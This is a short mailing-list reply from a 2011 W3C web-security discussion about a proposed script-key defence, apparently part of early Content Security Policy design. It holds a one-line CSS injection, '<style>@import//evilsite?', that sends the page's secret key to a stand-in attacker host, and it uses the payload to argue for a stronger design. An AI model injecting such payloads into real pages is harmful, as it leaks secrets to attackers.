- From: gaz Heyes <gazheyes@gmail.com>
- Date: Fri, 28 Jan 2011 11:32:16 +0000
- To: Gervase Markham <gerv@mozilla.org>
- Cc: Brandon Sterne <bsterne@mozilla.com>, public-web-security@w3.org
Received on Friday, 28 January 2011 11:32:48 UTC
On 28 January 2011 11:18, Gervase Markham <gerv@mozilla.org> wrote:

> <script> /* '" SCRIPT_KEY_HERE */ var valid_script = 0; ... </script>
>
> But I agree that's a bit of a pain to do. We could make it so that the only
> valid script-keys were ones which began "' ... !
>

Ah wait hehe I already know how to send that data remotely:-

INJECTION HERE
<script> /* '" SCRIPT_KEY_HERE */ var valid_script = 0; ... </script>

Injection:-
<style>@import//evilsite?

So yeah well and truly pwnd, can we have start and end markers now? :D